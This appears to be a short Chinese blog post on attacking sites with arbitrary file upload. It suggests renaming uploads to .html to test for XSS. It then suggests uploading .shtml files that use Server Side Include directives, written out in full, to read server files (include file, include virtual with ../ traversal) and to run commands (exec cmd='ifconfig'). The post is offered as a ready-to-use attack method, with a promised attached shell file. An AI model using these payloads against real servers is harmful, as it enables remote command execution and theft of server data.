两点:

1.任意文件上传

2.站点可以跨域

上传的时候更改后缀为html

 

对于成功能弹出cookie的站,就表示有XSS,这个时候可以加以利用,上传shtml文件进行命令执行

列举

<!–#include file=”/home/www/user7196/nav_foot.htm”–> //可以用来读文件

<!–#exec cmd=”ifconfig”–> //可以用来执行命令

<!–#include virtual=”/includes/header.html” –> //也是读文件 与FILE不同他支持绝对路径和../来跳转到父目录 而file只能读取当前目录下的

附上一个shtml 自行改名。

code

发表评论

电子邮件地址不会被公开。 必填项已用*标注